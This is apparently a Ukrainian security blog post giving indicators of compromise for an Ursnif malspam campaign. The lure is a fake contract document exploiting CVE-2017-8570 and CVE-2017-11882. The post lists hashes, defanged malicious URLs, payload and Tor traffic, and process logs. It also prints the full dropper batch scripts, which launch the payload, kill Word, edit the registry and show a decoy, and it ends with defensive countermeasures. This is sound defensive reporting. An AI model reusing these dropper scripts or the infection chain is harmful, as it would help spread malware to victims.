IOC_ursnif_020418

Доброго вечора, панове.

Вчора була зафіксована розсилка шкідливого коду типу #ursnif.

Рівень загрози – середній. Для тих, хто уважно читає наші поради – низький.

Лист, який було надано на аналіз стосується начебто заборгованості приватній компанії:

Минулого разу в якості претексту було взято звернення від ДФС.

Трохи аналітики:

  • Основний документ – RTF файл із вразливістю CVE-2017-8570
  • Основний документ містить кілька .bat файлів та основне тіло #ursnif та другий RTF документ (щоб відвести очі)
  • Перший (основний) документ також містить DDE лінк
  • Крім того основний документ експлуатує вразливість редактору формул 11882
  • Виправлення на 11882 не зупиняє процес інфікування
  • bat файл чітко регламентує шлях та ім’я основної частини
  • Додаткові модулі завантажуються з того ж серверу що і минулого разу
  • Не потребує прав Адміністратора
  • Основне тіло детектується ENS по GTI

Схема атаки:

email > URL > (DOC) ZIP > WINWORD > CMD > BAT > %temp%\exe.exe

Процес інфікування:

Маркери IOC:

Архів:

SHA-256        2b5d2e9fcb3513a7dd5a4713351edd10d3a8fff94f0405c178499d62b22c428a
File name   Копія_договору_№82910.zip
File size      514.43 KB

Документ приманка:

SHA-256        650813970c1182faab8c3eaf1bc2f1f1025ea85c60b3470296cea70e486561b2
File name   Dogovir copy № 82910.doc
File size      1.35 MB

Основна частина:

SHA-256        d6d81a58fcf3131ede03d6a1e3e96a813ea0494edf98be2f15363f022115bede
File name   exe.exe
File size      596 KB

Мережеві IOC:

завантаження архіву з документів (на сьогодні вже не активна)

185.117.72.168           h11p:\wonderingethome{.} com/dog_31682_hgbqjlcpe

Трафік скомпрометованої системи:

49.51.136.34      HTTP 186   providedatheyfromyouthe{.} club  GET /new/x32.bin HTTP/1.1    - так само як минулого разу

140.211.11.105   HTTP 185   www.apache{.} org     GET /licenses/LICENSE-2.0.txt HTTP/1.1    - шум для відволікання уваги

Комунікація через ноди Tor

199.254.238.52   HTTP 128   199.254.238.52   GET /tor/status-vote/current/consensus HTTP/1.0 Continuation
171.25.193.9      HTTP 126   171.25.193.9      GET /tor/status-vote/current/consensus HTTP/1.0 Continuation
78.47.14.4         HTTP 145   78.47.14.4         GET /tor/server/fp/bce02e4a73b6cf72f3855470e353060d85f6bd45 HTTP/1.0 Continuation
193.23.244.244   HTTP 128   193.23.244.244   GET /tor/status-vote/current/consensus HTTP/1.0 Continuation
185.107.83.71    HTTP 148   185.107.83.71    GET /tor/server/fp/59ce9f0403705b48f435ac90efc96b68f5fb84ad HTTP/1.0 Continuation
188.32.129.93    HTTP 148   188.32.129.93    GET /tor/server/fp/334cadf78800e0f14a7438ef45f81623e386e917 HTTP/1.0 Continuation
37.59.118.7        HTTP 146   37.59.118.7        GET /tor/server/fp/1ac9f76a39eca548b81266ab5f60fe6d263753cc HTTP/1.0 Continuation
82.94.251.203    HTTP 127   82.94.251.203    GET /tor/status-vote/current/consensus HTTP/1.0 Continuation
199.254.238.52   HTTP 128   199.254.238.52   GET /tor/status-vote/current/consensus HTTP/1.0 Continuation
82.94.251.203    HTTP 127   82.94.251.203    GET /tor/status-vote/current/consensus HTTP/1.0 Continuation
82.94.251.203    HTTP 127   82.94.251.203    GET /tor/status-vote/current/consensus HTTP/1.0 Continuation
86.59.21.38        HTTP 125   86.59.21.38        GET /tor/status-vote/current/consensus HTTP/1.0 Continuation

Активність по процесам:

Запуск документу-приманки ініціює CVE-2017-8570 – процес Winword видобуває вміст у %temp% і починає процес інфікування

В процесі запуску основний файл закривається, реєстр системи модифікується і користувачеві виводиться RTF файл decoy.doc

"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Windows\System32\cmd.exe" /C C:\tmp\tAsK.bAt
C:\Windows\system32\cmd.exe  /K C:\tmp\2nd.bat

Зміст task.bat

ECHO OFF
set uu="%TMp%\block.txt"
IF EXIST %uu% (exit) ELSE (set uu="%TMp%\block.txt" & copy NUL %uu% & start /b %TMp%\2nd.bat)
Del task.bat
exit

Зміст 2nd.bat

ECHO OFF
TIMEOUT 1
start %TeMp%\ExE.ExE
set "App=winword.exe"
TASKKILL /F /IM %App%
reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\8.0 – 16.0\Word\Resiliency /f
for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0 – 16.0 \Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"
copy %TeMp%\DeCoY.DoC "%AppPath%"
"%AppPath%"
DeL %tMp%\Block.TxT
DeL %tMp%\Inteldriverupd1.ScT

Продовження активності

Запуск основної частини, зупинка MS Word, видалення ключів реєстру та відображення другого RTF документу decoy.doc

C:\Windows\SysWOW64\timeout.exe 1
C:\tmp\ExE.ExE
C:\Windows\SysWOW64\reg.exe delete HKEY_CURRENT_USER\Software\Microsoft\Office\8-16.0\Word\Resiliency /f
C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"
C:\Windows\SysWOW64\reg.exe REG  QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"
"C:\Windows\System32\cmd.exe" /C C:\tmp\tAsK.bAt

Контрзаходи:

  • Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона створення та зчитування/запуску *.BAT та *.EXE файлів з каталогів профілю C:\Users\**\ !
  • Заборона запуску дочірніх процесів для додатків MS Office – правила Access Protection
  • Встановлення виправлень CVE-2017-8570 та CVE-2017-11882
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

PS

Покроково:



VR

Tags: , , , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: